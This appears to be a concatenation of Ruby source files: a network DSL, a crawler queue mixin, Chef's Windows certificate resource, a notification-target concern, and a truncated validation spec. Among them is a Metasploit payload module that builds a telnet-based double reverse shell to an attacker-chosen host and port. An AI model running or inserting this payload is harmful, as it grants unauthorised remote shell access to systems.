def initialize
@internal = []
@other = []
end
end
class NetworkDSL
attr_reader :network
def initialize
@network = Network.new
end
def internal(*ip_addresses)
ip_addresses.each do |ip_addr_str|
ip_addr = IP.new ip_addr_str
@network.internal << ip_addr
end
end
def other(*ip_addresses)
ip_addresses.each do |ip_addr_str|
ip_addr = IP.new ip_addr_str
@network.other << ip_addr
end
end
end
protected
@_network = nil
end
end
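
# Illustrative usage sketch (addresses are hypothetical): the DSL above is driven
# through Themis::Configuration.network, which instance-evals the block against a
# NetworkDSL instance and stores the resulting Network for later lookup.
#
#   Themis::Configuration.network do
#     internal '10.0.1.0/24', '10.0.2.0/24'
#     other '192.168.50.0/24'
#   end
#
#   Themis::Configuration.get_network.internal  # => two IP objects for the internal ranges
#   Themis::Configuration.get_network.other     # => one IP object for the other range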
| 22.403846 | 50 | 0.482403 |
5d347439e63f9d5d53df4845a099cfd5c1615788 | 899 | module Anemone
module Queue
NEW = 0
PROCESSED = 1
def self.included(base)
base.extend Anemone::Queue::ClassMethods
base.send(:include, Anemone::Queue::InstanceMethods)
base.send :field, :state, :Integer, :default => NEW
base.send :field, :fetched_at, :Time
end
module ClassMethods
def deq
self.find_and_modify({:state => NEW}, {:state => PROCESSED})
end
def enq(attrs)
self.create(attrs) unless self.exists?(:url => attrs[:url].to_s)
end
def queue_empty?
self.count(:state => NEW) == 0
end
end
module InstanceMethods
def enq
self.save unless self.class.exists?(:url => url)
end
def processed
self.class.update({:_id => _id}, {:state => PROCESSED})
end
def processed?
state == PROCESSED
end
end
end
end
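
# Illustrative usage sketch: a document model mixes this module in and gains a
# minimal work queue (state NEW -> PROCESSED). The Page class and URL below are
# hypothetical; the including model is assumed to provide `field`,
# `find_and_modify`, `exists?` and friends (e.g. a MongoDB-backed ORM).
#
#   class Page
#     include Anemone::Queue
#     field :url, :String
#   end
#
#   Page.enq(url: 'http://example.com/')  # enqueue once per URL
#   page = Page.deq                       # atomically claim a NEW record
#   page.processed                        # mark it PROCESSED
#   Page.queue_empty?                     # => true once nothing is left in state NEW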
| 19.977778 | 72 | 0.575083 |
ab1494300cbc74aafdf21498df8b7474132a7b19 | 1,395 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
CachedSize = 130
include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Unix Command Shell, Double Reverse TCP (telnet)',
'Description' => 'Creates an interactive shell through two inbound connections',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::ReverseTcpDouble,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'telnet',
'Payload' =>
{
'Offsets' => { },
'Payload' => ''
}
))
end
#
# Constructs the payload
#
def generate
vprint_good(command_string)
return super + command_string
end
#
# Returns the command string to use for execution
#
def command_string
cmd =
"sh -c '(sleep #{3600+rand(1024)}|" +
"telnet #{datastore['LHOST']} #{datastore['LPORT']}|" +
"while : ; do sh && break; done 2>&1|" +
"telnet #{datastore['LHOST']} #{datastore['LPORT']}" +
" >/dev/null 2>&1 &)'"
return cmd
end
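# For illustration only: with hypothetical datastore values LHOST=192.0.2.10 and
# LPORT=4444, command_string expands to something like
#   sh -c '(sleep 3742|telnet 192.0.2.10 4444|while : ; do sh && break; done 2>&1|telnet 192.0.2.10 4444 >/dev/null 2>&1 &)'
# so the first telnet connection feeds the shell's stdin and the second carries
# its output back to the handler.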
end
| 25.363636 | 88 | 0.564875 |
79abfa4c196d6ac3e70d520e58b437299b70cd37 | 23,700 | #
# Author:: Richard Lavey ([email protected])
#
# Copyright:: 2015-2017, Calastone Ltd.
# Copyright:: Copyright (c) Chef Software Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require_relative "../util/path_helper"
require_relative "../resource"
require_relative "../exceptions"
module Win32
autoload :Certstore, "win32-certstore" if Chef::Platform.windows?
end
autoload :OpenSSL, "openssl"
require "chef-utils/dist" unless defined?(ChefUtils::Dist)
class Chef
class Resource
class WindowsCertificate < Chef::Resource
provides :windows_certificate
description "Use the **windows_certificate** resource to install a certificate into the Windows certificate store from a file. The resource grants read-only access to the private key for designated accounts. Due to current limitations in WinRM, installing certificates remotely may not work if the operation requires a user profile. Operations on the local machine store should still work."
introduced "14.7"
examples <<~DOC
**Add PFX cert to local machine personal store and grant accounts read-only access to private key**
```ruby
windows_certificate 'c:/test/mycert.pfx' do
pfx_password 'password'
private_key_acl ["acme\\fred", "pc\\jane"]
end
```
**Add cert to trusted intermediate store**
```ruby
windows_certificate 'c:/test/mycert.cer' do
store_name 'CA'
end
```
**Remove all certificates matching the subject**
```ruby
windows_certificate 'me.acme.com' do
action :delete
end
```
DOC
property :source, String,
description: "The source file (for `create` and `acl_add`), thumbprint (for `delete`, `export`, and `acl_add`), or subject (for `delete` or `export`) if it differs from the resource block's name.",
name_property: true
property :pfx_password, String,
description: "The password to access the object with if it is a PFX file."
property :private_key_acl, Array,
description: "An array of 'domain\\account' entries to be granted read-only access to the certificate's private key. Not idempotent."
property :store_name, String,
description: "The certificate store to manipulate.",
default: "MY", equal_to: ["TRUSTEDPUBLISHER", "TrustedPublisher", "CLIENTAUTHISSUER", "REMOTE DESKTOP", "ROOT", "TRUSTEDDEVICES", "WEBHOSTING", "CA", "AUTHROOT", "TRUSTEDPEOPLE", "MY", "SMARTCARDROOT", "TRUST", "DISALLOWED"]
property :user_store, [TrueClass, FalseClass],
description: "Use the `CurrentUser` store instead of the default `LocalMachine` store. Note: Prior to #{ChefUtils::Dist::Infra::CLIENT}. 16.10 this property was ignored.",
default: false
deprecated_property_alias :cert_path, :output_path, "The cert_path property was renamed output_path in the 17.0 release of #{ChefUtils::Dist::Infra::CLIENT}. Please update your cookbooks to use the new property name."
# lazy used to set default value of sensitive to true if password is set
property :sensitive, [TrueClass, FalseClass],
description: "Ensure that sensitive resource data is not logged by the #{ChefUtils::Dist::Infra::CLIENT}.",
default: lazy { pfx_password ? true : false }, skip_docs: true
property :exportable, [TrueClass, FalseClass],
description: "Ensure that imported pfx certificate is exportable. Please provide 'true' if you want the certificate to be exportable.",
default: false,
introduced: "16.8"
property :output_path, String,
description: "A path on the node where a certificate object (PFX, PEM, CER, KEY, etc) can be exported to.",
introduced: "17.0"
action :create, description: "Creates or updates a certificate." do
ext = get_file_extension(new_resource.source)
# PFX certificates contains private keys and we import them with some other approach
# import_certificates(fetch_cert_object(ext), (ext == ".pfx"))
import_certificates(fetch_cert_object_from_file(ext), (ext == ".pfx"))
end
# acl_add is a modify-if-exists operation : not idempotent
action :acl_add, description: "Adds read-only entries to a certificate's private key ACL." do
if ::File.exist?(new_resource.source)
hash = "$cert.GetCertHashString()"
code_script = cert_script(false)
guard_script = cert_script(false)
else
# make sure we have no spaces in the hash string
hash = "\"#{new_resource.source.gsub(/\s/, "")}\""
code_script = ""
guard_script = ""
end
code_script << acl_script(hash)
guard_script << cert_exists_script(hash)
powershell_script "setting the acls on #{new_resource.source} in #{ps_cert_location}\\#{new_resource.store_name}" do
convert_boolean_return true
code code_script
only_if guard_script
sensitive if new_resource.sensitive
end
end
action :delete, description: "Deletes a certificate." do
cert_is_valid = verify_cert
if cert_is_valid == true
converge_by("Deleting certificate #{new_resource.source} from Store #{new_resource.store_name}") do
delete_cert
end
else
Chef::Log.debug("Certificate Not Found")
end
end
action :fetch, description: "Fetches a certificate." do
unless new_resource.output_path
raise Chef::Exceptions::ResourceNotFound, "You must include an output_path parameter when calling the fetch action"
end
if ::File.extname(new_resource.output_path) == ".pfx"
validated_thumbprint = validate_thumbprint(new_resource.source)
if validated_thumbprint != false # is the thumbprint valid
cert_obj = powershell_exec!(pfx_ps_cmd(validate_thumbprint(new_resource.source), store_location: ps_cert_location, store_name: new_resource.store_name, output_path: new_resource.output_path, password: new_resource.pfx_password ))
else
message = "While fetching the certificate, was passed the following invalid certificate thumbprint : #{new_resource.source}\n"
raise Chef::Exceptions::InvalidKeyAttribute, message
end
else
cert_obj = fetch_cert
end
if cert_obj != false && cert_obj != "Certificate Not Found"
converge_by("Fetching certificate #{new_resource.source} from Store \\#{ps_cert_location}\\#{new_resource.store_name}") do
export_cert(cert_obj, output_path: new_resource.output_path, store_name: new_resource.store_name , store_location: ps_cert_location, pfx_password: new_resource.pfx_password)
end
else
Chef::Log.debug("Certificate Not Found")
end
end
action :verify, description: "Verifies a certificate and logs the result." do
out = verify_cert
if !!out == out
out = out ? "Certificate is valid" : "Certificate not valid"
end
Chef::Log.info(out.to_s)
end
action_class do
@local_pfx_path = ""
CERT_SYSTEM_STORE_LOCAL_MACHINE = 0x00020000
CERT_SYSTEM_STORE_CURRENT_USER = 0x00010000
def add_cert(cert_obj)
store = ::Win32::Certstore.open(new_resource.store_name, store_location: native_cert_location)
store.add(cert_obj)
end
def add_pfx_cert(path)
exportable = new_resource.exportable ? 1 : 0
store = ::Win32::Certstore.open(new_resource.store_name, store_location: native_cert_location)
store.add_pfx(path, new_resource.pfx_password, exportable)
end
def delete_cert
store = ::Win32::Certstore.open(new_resource.store_name, store_location: native_cert_location)
store.delete(validate_thumbprint(new_resource.source))
end
def fetch_cert
store = ::Win32::Certstore.open(new_resource.store_name, store_location: native_cert_location)
if new_resource.output_path && ::File.extname(new_resource.output_path) == ".key"
fetch_key
else
store.get(validate_thumbprint(new_resource.source))
end
end
def fetch_key
require "openssl" unless defined?(OpenSSL)
file_name = ::File.basename(new_resource.output_path, ::File.extname(new_resource.output_path))
pfx_file = file_name + ".pfx"
new_pfx_output_path = ::File.join(Chef::FileCache.create_cache_path("pfx_files"), pfx_file)
powershell_exec(pfx_ps_cmd(validate_thumbprint(new_resource.source), store_location: ps_cert_location, store_name: new_resource.store_name, output_path: new_pfx_output_path, password: new_resource.pfx_password ))
pkcs12 = OpenSSL::PKCS12.new(::File.binread(new_pfx_output_path), new_resource.pfx_password)
f = ::File.open(new_resource.output_path, "w")
f.write(pkcs12.key.to_s)
f.flush
f.close
end
def get_file_extension(file_name)
if is_file?(file_name)
::File.extname(file_name)
elsif is_url?(file_name)
require "open-uri" unless defined?(OpenURI)
uri = URI.parse(file_name)
output_file = ::File.basename(uri.path)
::File.extname(output_file)
end
end
def get_file_name(path_name)
if is_file?(path_name)
::File.extname(path_name)
elsif is_url?(path_name)
require "open-uri" unless defined?(OpenURI)
uri = URI.parse(path_name)
::File.basename(uri.path)
end
end
def is_url?(source)
require "uri" unless defined?(URI)
uri = URI.parse(source)
uri.is_a?(URI::HTTP) || uri.is_a?(URI::HTTPS)
end
def is_file?(source)
::File.file?(source)
end
# Thumbprints should be exactly 40 Hex characters
def valid_thumbprint?(string)
string.match?(/[0-9A-Fa-f]/) && string.length == 40
end
def get_thumbprint(store_name, location, source)
<<-GETTHUMBPRINTCODE
$content = Get-ChildItem -Path Cert:\\#{location}\\#{store_name} | Where-Object {$_.Subject -Match "#{source}"} | Select-Object Thumbprint
$content.thumbprint
GETTHUMBPRINTCODE
end
def validate_thumbprint(thumbprint)
# valid_thumbprint can return false under at least 2 conditions:
# one is that the thumbprint is in fact busted
# the second is that the thumbprint is valid but belongs to an expired certificate already installed
results = valid_thumbprint?(thumbprint)
results == true ? thumbprint : false
end
# Checks to make sure whether the cert is found or not
# if it IS found, is it still valid - has it expired?
def verify_cert(thumbprint = new_resource.source)
store = ::Win32::Certstore.open(new_resource.store_name, store_location: native_cert_location)
validated_thumbprint = validate_thumbprint(thumbprint)
if validated_thumbprint != false
result = store.valid?(thumbprint)
["Certificate Not Found", "Certificate Has Expired"].include?(result) ? false : true
else
message = "While verifying the certificate, was passed the following invalid certificate thumbprint : #{thumbprint}\n"
raise Chef::Exceptions::InvalidKeyAttribute, message
end
end
# this structure is solving 2 problems. The first is that we need to have support for both the CurrentUser AND LocalMachine stores
# Secondly, we need to pass the proper constant name for each store to win32-certstore but also pass the short name to powershell scripts used here
def ps_cert_location
new_resource.user_store ? "CurrentUser" : "LocalMachine"
end
def pfx_ps_cmd(thumbprint, store_location: "LocalMachine", store_name: "My", output_path:, password: )
<<-CMD
$my_pwd = ConvertTo-SecureString -String "#{password}" -Force -AsPlainText
$cert = Get-ChildItem -path cert:\\#{store_location}\\#{store_name} -Recurse | Where { $_.Thumbprint -eq "#{thumbprint.upcase}" }
Export-PfxCertificate -Cert $cert -FilePath "#{output_path}" -Password $my_pwd
CMD
end
def native_cert_location
new_resource.user_store ? CERT_SYSTEM_STORE_CURRENT_USER : CERT_SYSTEM_STORE_LOCAL_MACHINE
end
def cert_script(persist)
cert_script = "$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2"
file = Chef::Util::PathHelper.cleanpath(new_resource.source, ps_cert_location)
cert_script << " \"#{file}\""
if ::File.extname(file.downcase) == ".pfx"
cert_script << ", \"#{new_resource.pfx_password}\""
if persist && new_resource.user_store
cert_script << ", ([System.Security.Cryptography.X509Certificates.X509KeyStorageFlags]::PersistKeySet)"
elsif persist
cert_script << ", ([System.Security.Cryptography.X509Certificates.X509KeyStorageFlags]::PersistKeySet -bor [System.Security.Cryptography.X509Certificates.X509KeyStorageFlags]::MachineKeyset)"
end
end
cert_script << "\n"
end
def cert_exists_script(hash)
<<-EOH
$hash = #{hash}
Test-Path "Cert:\\#{ps_cert_location}\\#{new_resource.store_name}\\$hash"
EOH
end
def within_store_script
inner_script = yield "$store"
<<-EOH
$store = New-Object System.Security.Cryptography.X509Certificates.X509Store "#{new_resource.store_name}", ([System.Security.Cryptography.X509Certificates.StoreLocation]::#{ps_cert_location})
$store.Open([System.Security.Cryptography.X509Certificates.OpenFlags]::ReadWrite)
#{inner_script}
$store.Close()
EOH
end
def acl_script(hash)
return "" if new_resource.private_key_acl.nil? || new_resource.private_key_acl.empty?
# this PS came from http://blogs.technet.com/b/operationsguy/archive/2010/11/29/provide-access-to-private-keys-commandline-vs-powershell.aspx
# and from https://msdn.microsoft.com/en-us/library/windows/desktop/bb204778(v=vs.85).aspx
set_acl_script = <<-EOH
$hash = #{hash}
$storeCert = Get-ChildItem "cert:\\#{ps_cert_location}\\#{new_resource.store_name}\\$hash"
if ($storeCert -eq $null) { throw 'no key exists.' }
$keyname = $storeCert.PrivateKey.CspKeyContainerInfo.UniqueKeyContainerName
if ($keyname -eq $null) { throw 'no private key exists.' }
if ($storeCert.PrivateKey.CspKeyContainerInfo.MachineKeyStore)
{
$fullpath = "$Env:ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\$keyname"
}
else
{
$currentUser = New-Object System.Security.Principal.NTAccount($Env:UserDomain, $Env:UserName)
$userSID = $currentUser.Translate([System.Security.Principal.SecurityIdentifier]).Value
$fullpath = "$Env:ProgramData\\Microsoft\\Crypto\\RSA\\$userSID\\$keyname"
}
EOH
new_resource.private_key_acl.each do |name|
set_acl_script << "$uname='#{name}'; icacls $fullpath /grant $uname`:RX\n"
end
set_acl_script
end
# Method returns an OpenSSL::X509::Certificate object. Might also return multiple certificates if present in certificate path
#
# Based on its extension, the certificate contents are used to initialize
# PKCS12 (PFX), PKCS7 (P7B) objects which contains OpenSSL::X509::Certificate.
#
# @note Other than PEM, all the certificates are usually in binary format, and hence
# their contents are loaded by using File.binread
#
# @param ext [String] Extension of the certificate
#
# @return [OpenSSL::X509::Certificate] Object containing certificate's attributes
#
# @raise [OpenSSL::PKCS12::PKCS12Error] When incorrect password is provided for PFX certificate
#
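# @example Illustrative call (the source path and extension below are hypothetical)
#   # with new_resource.source pointing at a local PEM file:
#   fetch_cert_object_from_file(".pem") # => an OpenSSL::X509::Certificate
#   # with a password-protected PFX it returns the certificate plus any bundled CA certificates
#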
def fetch_cert_object_from_file(ext)
if is_file?(new_resource.source)
begin
::File.exist?(new_resource.source)
contents = ::File.binread(new_resource.source)
rescue => exception
message = "Unable to load the certificate object from the specified local path : #{new_resource.source}\n"
message << exception.message
raise Chef::Exceptions::FileNotFound, message
end
elsif is_url?(new_resource.source)
require "uri" unless defined?(URI)
uri = URI(new_resource.source)
state = uri.is_a?(URI::HTTP) && !uri.host.nil? ? true : false
if state
begin
output_file_name = get_file_name(new_resource.source)
unless Dir.exist?(Chef::Config[:file_cache_path])
Dir.mkdir(Chef::Config[:file_cache_path])
end
local_path = ::File.join(Chef::Config[:file_cache_path], output_file_name)
@local_pfx_path = local_path
::File.open(local_path, "wb") do |file|
file.write URI.open(new_resource.source).read
end
rescue => exception
message = "Not Able to Download Certificate Object at the URL specified : #{new_resource.source}\n"
message << exception.message
raise Chef::Exceptions::FileNotFound, message
end
contents = ::File.binread(local_path)
else
message = "Not Able to Download Certificate Object at the URL specified : #{new_resource.source}\n"
raise Chef::Exceptions::InvalidRemoteFileURI, message
end
else
message = "You passed an invalid file or url to import. Please check the spelling and try again."
raise Chef::Exceptions::ArgumentError, message
end
case ext
when ".pfx"
pfx = OpenSSL::PKCS12.new(contents, new_resource.pfx_password)
if pfx.ca_certs.nil?
pfx.certificate
else
[pfx.certificate] + pfx.ca_certs
end
when ".p7b"
OpenSSL::PKCS7.new(contents).certificates
else
OpenSSL::X509::Certificate.new(contents)
end
end
def export_cert(cert_obj, output_path:, store_name:, store_location:, pfx_password:)
# Delete the cert if it exists on disk already.
# We want to ensure we're not randomly loading an old stinky cert.
if ::File.exist?(output_path)
::File.delete(output_path)
end
unless ::File.directory?(::File.dirname(output_path))
FileUtils.mkdir_p(::File.dirname(output_path))
end
out_file = ::File.new(output_path, "w+")
case ::File.extname(output_path)
when ".pem"
out_file.puts(cert_obj)
when ".der"
out_file.puts(cert_obj.to_der)
when ".cer"
cert_out = shell_out("openssl x509 -text -inform DER -in #{cert_obj.to_pem} -outform CER").stdout
out_file.puts(cert_out)
when ".crt"
cert_out = shell_out("openssl x509 -text -inform DER -in #{cert_obj} -outform CRT").stdout
out_file.puts(cert_out)
when ".pfx"
validated_thumbprint = validate_thumbprint(new_resource.source)
if validated_thumbprint != false # is the thumbprint valid
store = ::Win32::Certstore.open(new_resource.store_name, store_location: native_cert_location)
result = store.valid?(new_resource.source) # is there a cert in the store matching that thumbprint
temp = ["Certificate Not Found", "Certificate Has Expired"].include?(result) ? false : true
if temp == true
pfx_ps_cmd(validate_thumbprint(new_resource.source), store_location: store_location, store_name: store_name, output_path: output_path, password: pfx_password )
else
Chef::Log.debug("The requested certificate is not found or has expired")
end
else
message = "While exporting the pfx, was passed the following invalid certificate thumbprint : #{new_resource.source}\n"
raise Chef::Exceptions::InvalidKeyAttribute, message
end
when ".p7b"
cert_out = shell_out("openssl pkcs7 -export -nokeys -in #{cert_obj.to_pem} -outform P7B").stdout
out_file.puts(cert_out)
when ".key"
out_file.puts(cert_obj)
else
Chef::Log.info("Supported certificate format .pem, .der, .cer, .crt, and .p7b")
end
out_file.close
end
# Imports the certificate object into cert store
#
# @param cert_objs [OpenSSL::X509::Certificate] Object containing certificate's attributes
#
# @param is_pfx [Boolean] true if we want to import a PFX certificate
#
def import_certificates(cert_objs, is_pfx, store_name: new_resource.store_name, store_location: native_cert_location)
[cert_objs].flatten.each do |cert_obj|
thumbprint = OpenSSL::Digest.new("SHA1", cert_obj.to_der).to_s
if verify_cert(thumbprint) == true
Chef::Log.debug("Certificate is already present")
elsif verify_cert(thumbprint) == false # Not found already in the CertStore
if is_pfx
if is_file?(new_resource.source)
converge_by("Creating a PFX #{new_resource.source} for Store #{new_resource.store_name}") do
add_pfx_cert(new_resource.source)
end
elsif is_url?(new_resource.source)
converge_by("Creating a PFX #{@local_pfx_path} for Store #{new_resource.store_name}") do
add_pfx_cert(@local_pfx_path)
end
else
message = "You passed an invalid file or url to import. Please check the spelling and try again."
raise Chef::Exceptions::ArgumentError, message
end
else
converge_by("Creating a certificate #{new_resource.source} for Store #{new_resource.store_name}") do
add_cert(cert_obj)
end
end
else
message = "Certificate could not be imported"
raise Chef::Exceptions::CertificateNotImportable, message
end
end
end
end
end
end
end
| 44.548872 | 396 | 0.639873 |
87572e12171228407dde31d3db9c473427c02b6f | 7,885 | module ActivityNotification
# Manages to add all required configurations to target models of notification.
module ActsAsTarget
extend ActiveSupport::Concern
class_methods do
# Adds required configurations to notifiable models.
#
# == Parameters:
# * :email
# * Email address to send notification email.
# This is a necessary option when you enable email notification.
# @example Simply use :email field
# # app/models/user.rb
# class User < ActiveRecord::Base
# validates :email, presence: true
# acts_as_target email: :email
# end
#
# * :email_allowed
# * Whether activity_notification sends notification email to this target.
# The specified method or symbol is expected to return true (not nil) or false (nil).
# This parameter is optional since the default value is false.
# To use notification email, the email_allowed option must return true (not nil) in both the notifiable and target models.
# This can also be configured as a default option in the initializer.
# @example Always enable email notification for this target
# # app/models/user.rb
# class User < ActiveRecord::Base
# acts_as_target email: :email, email_allowed: true
# end
# @example Use confirmed_at of devise field to decide whether activity_notification sends notification email to this user
# # app/models/user.rb
# class User < ActiveRecord::Base
# acts_as_target email: :email, email_allowed: :confirmed_at
# end
#
# * :devise_resource
# * Integrated resource with devise authentication.
# This parameter is optional since `self` is used as the default value.
# You also have to configure routing for devise in routes.rb
# @example No :devise_resource is needed when notification target is the same as authenticated resource
# # config/routes.rb
# devise_for :users
# notify_to :users
#
# # app/models/user.rb
# class User < ActiveRecord::Base
# devise :database_authenticatable, :registerable, :confirmable
# acts_as_target email: :email, email_allowed: :confirmed_at
# end
#
# @example Send Admin model and use associated User model with devise authentication
# # config/routes.rb
# devise_for :users
# notify_to :admins, with_devise: :users
#
# # app/models/user.rb
# class User < ActiveRecord::Base
# devise :database_authenticatable, :registerable, :confirmable
# end
#
# # app/models/admin.rb
# class Admin < ActiveRecord::Base
# belongs_to :user
# validates :user, presence: true
# acts_as_notification_target email: :email,
# email_allowed: ->(admin, key) { admin.user.confirmed_at.present? },
# devise_resource: :user
# end
#
# * :current_devise_target
# * Current authenticated target by devise authentication.
# This parameter is optional since `current_<devise_resource_name>` is used as the default value.
# In addition, this parameter is only needed when :devise_default_route in your routes.rb is enabled.
# You also have to configure routing for devise in routes.rb
# @example No :current_devise_target is needed when notification target is the same as authenticated resource
# # config/routes.rb
# devise_for :users
# notify_to :users
#
# # app/models/user.rb
# class User < ActiveRecord::Base
# devise :database_authenticatable, :registerable, :confirmable
# acts_as_target email: :email, email_allowed: :confirmed_at
# end
#
# @example Send Admin model and use associated User model with devise authentication
# # config/routes.rb
# devise_for :users
# notify_to :admins, with_devise: :users
#
# # app/models/user.rb
# class User < ActiveRecord::Base
# devise :database_authenticatable, :registerable, :confirmable
# end
#
# # app/models/admin.rb
# class Admin < ActiveRecord::Base
# belongs_to :user
# validates :user, presence: true
# acts_as_notification_target email: :email,
# email_allowed: ->(admin, key) { admin.user.confirmed_at.present? },
# devise_resource: :user,
# current_devise_target: ->(current_user) { current_user.admin }
# end
#
# * :printable_name or :printable_notification_target_name
# * Printable notification target name.
      #     This parameter is optional since `ActivityNotification::Common.printable_name` is used as the default value.
# :printable_name is the same option as :printable_notification_target_name
# @example Define printable name with user name of name field
# # app/models/user.rb
# class User < ActiveRecord::Base
# acts_as_target printable_name: :name
# end
#
# @example Define printable name with associated user name
# # app/models/admin.rb
# class Admin < ActiveRecord::Base
# acts_as_target printable_notification_target_name: ->(admin) { "admin (#{admin.user.name})" }
# end
#
      # @param [Hash] options Options for target model configuration
# @option options [Symbol, Proc, String] :email (nil) Email address to send notification email
# @option options [Symbol, Proc, Boolean] :email_allowed (ActivityNotification.config.email_enabled) Whether activity_notification sends notification email to this target
# @option options [Symbol, Proc, Boolean] :batch_email_allowed (ActivityNotification.config.email_enabled) Whether activity_notification sends batch notification email to this target
# @option options [Symbol, Proc, Boolean] :subscription_allowed (ActivityNotification.config.subscription_enabled) Whether activity_notification manages subscriptions of this target
# @option options [Symbol, Proc, Object] :devise_resource (->(model) { model }) Integrated resource with devise authentication
# @option options [Symbol, Proc, Object] :current_devise_target (->(current_resource) { current_resource }) Current authenticated target by devise authentication
# @option options [Symbol, Proc, String] :printable_name (ActivityNotification::Common.printable_name) Printable notification target name
# @return [Hash] Configured parameters as target model
def acts_as_target(options = {})
include Target
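        # Normalize the aliased option names into their canonical keys before filtering.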
options[:printable_notification_target_name] ||= options.delete(:printable_name)
options[:batch_notification_email_allowed] ||= options.delete(:batch_email_allowed)
acts_as_params = set_acts_as_parameters([:email, :email_allowed, :subscription_allowed, :devise_resource, :current_devise_target], options, "notification_")
.merge set_acts_as_parameters([:batch_notification_email_allowed, :printable_notification_target_name], options)
include Subscriber if subscription_enabled?
acts_as_params
end
alias_method :acts_as_notification_target, :acts_as_target
# Returns array of available target options in acts_as_target.
# @return [Array<Symbol>] Array of available target options
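      # @example Inspect the available options (illustrative)
      #   User.available_target_options
      #   # => [:email, :email_allowed, :batch_email_allowed, :subscription_allowed, :devise_resource, :printable_notification_target_name, :printable_name]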
def available_target_options
[:email, :email_allowed, :batch_email_allowed, :subscription_allowed, :devise_resource, :printable_notification_target_name, :printable_name].freeze
end
end
end
end
| 51.875 | 197 | 0.659734 |
1a9c39222ab9ec06ef505d1178e2d3dbcb412647 | 197 | json.array!(@tournaments) do |tournament|
json.extract! tournament, :id, :fecha_inicio, :fecha_termino, :puntos_minimo, :jugadores_maximo
json.url tournament_url(tournament, format: :json)
end
| 39.4 | 97 | 0.77665 |
bb50941a504d370950b9e0c1cb620b68c39eaa47 | 1,065 | Pod::Spec.new do |s|
s.name = 'KVKCalendar'
s.version = '0.3.2'
  s.summary          = 'A highly customizable calendar library for iOS.'
s.description = <<-DESC
  KVKCalendar is a highly customizable calendar library.
  The library consists of four modules for displaying various types of calendar (day, week, month, year).
  You can choose any module or use them all. It is designed based on the standard iOS calendar, but with additional features.
Timeline displays the schedule for the day and week.
DESC
s.homepage = 'https://github.com/kvyatkovskys/KVKCalendar'
s.license = { :type => 'MIT', :file => 'LICENSE.md' }
s.author = { 'Sergei Kviatkovskii' => '[email protected]' }
s.source = { :git => 'https://github.com/kvyatkovskys/KVKCalendar.git', :tag => s.version.to_s }
s.social_media_url = 'https://github.com/kvyatkovskys'
s.ios.deployment_target = '10.0'
s.source_files = 'KVKCalendar/Classes/*.swift'
s.swift_version = '5.0'
end
| 48.409091 | 118 | 0.647887 |
626137775a2c131251db07c76c09496fd8353feb | 889 | class Rpg < Formula
desc "Ruby package management for UNIX"
homepage "https://github.com/rtomayko/rpg"
url "https://github.com/downloads/rtomayko/rpg/rpg-0.3.0.tar.gz"
sha256 "c350f64744fb602956a91a57c8920e69058ea42e4e36b0e74368e96954d9d0c7"
head "https://github.com/rtomayko/rpg.git"
bottle do
cellar :any_skip_relocation
sha256 "be6550c915e361dcc0e020048f9a5f4ea37f1c5890a526282a3d70c610594981" => :el_capitan
sha256 "5c1af29955697dcd46ff58fd70f9aca986b977f3cc17f638822c81289f180df2" => :yosemite
sha256 "2ebf1a744c3c072c107883f565c04154b3e530c93868bb438bb90a1be35a4cb7" => :mavericks
sha256 "d32135e52bef3d16d6538dd8050cef4e1081474cc1156462a900ab2afa28b448" => :mountain_lion
end
def install
system "./configure", "--prefix=#{prefix}"
system "make"
system "make", "install"
end
test do
system "#{bin}/rpg", "config"
end
end
| 32.925926 | 95 | 0.768279 |
f70f3720651343c7167fb5fece969a542a881aae | 1,588 | class Bastet < Formula
desc "Bastard Tetris"
homepage "https://fph.altervista.org/prog/bastet.html"
url "https://github.com/fph/bastet/archive/0.43.2.tar.gz"
sha256 "f219510afc1d83e4651fbffd5921b1e0b926d5311da4f8fa7df103dc7f2c403f"
bottle do
rebuild 1
sha256 "0dfeabb0071431e426ac18b366ff5d065067075e7d3f4572e55a281e6702e215" => :catalina
sha256 "d1315f05616c060c8b5e83a9ae494f2ffecd2f78d53ef554192bb0e12ef451ef" => :mojave
sha256 "188658452934d4ef5d48d6837fb0c6bf3e3875488e0c1da8dcf62ca37c1ee998" => :high_sierra
sha256 "8133c13d1b98d96eacf5d420d30378fbfcd9cbe898b0f13b188112618f4338f5" => :sierra
sha256 "e3745b716c09ce7f3834f4fc30163fa132f93feeec4c301dc9d46b0bc9ca564f" => :el_capitan
sha256 "254d21cc32a309c4b91ba5008fdfe56dbd355312948de849e2172fbf2201ab83" => :x86_64_linux
end
depends_on "boost"
# Fix compilation with Boost >= 1.65, remove for next release
patch do
url "https://github.com/fph/bastet/commit/0e03f8d4.patch?full_index=1"
sha256 "9b937d070a4faf150f60f82ace790c7a1119cff0685b52edf579740d2c415d7b"
end
def install
inreplace %w[Config.cpp bastet.6], "/var", var
system "make", "all"
# this must exist for games to be saved globally
(var/"games").mkpath
touch "#{var}/games/bastet.scores2"
bin.install "bastet"
man6.install "bastet.6"
end
test do
pid = fork do
exec bin/"bastet"
end
sleep 3
assert_predicate bin/"bastet", :exist?
assert_predicate bin/"bastet", :executable?
ensure
Process.kill("TERM", pid)
Process.wait(pid)
end
end
| 31.137255 | 94 | 0.752519 |
e81486eeccf882d5c927ca6d8fd88c5c008efbab | 1,654 | require "spec_helper"
describe ActiveModel::Validations::SizeValidator do
context "validates that the attribute has a maximum number of values" do
class TestJsonSize < HarvesterCore::Json::Base
attribute :landing_url, path: "landing_url"
validates :landing_url, size: { maximum: 2 }
end
it "should be valid when it has one value" do
record = TestJsonSize.new({"landing_url" => ["http://google.com/1"]})
record.set_attribute_values
record.valid?.should be_true
end
it "should not be valid when it has more than the maximum" do
record = TestJsonSize.new({"landing_url" => ["http://google.com/1", "http://google.com/2", "http://google.com/3"]})
record.set_attribute_values
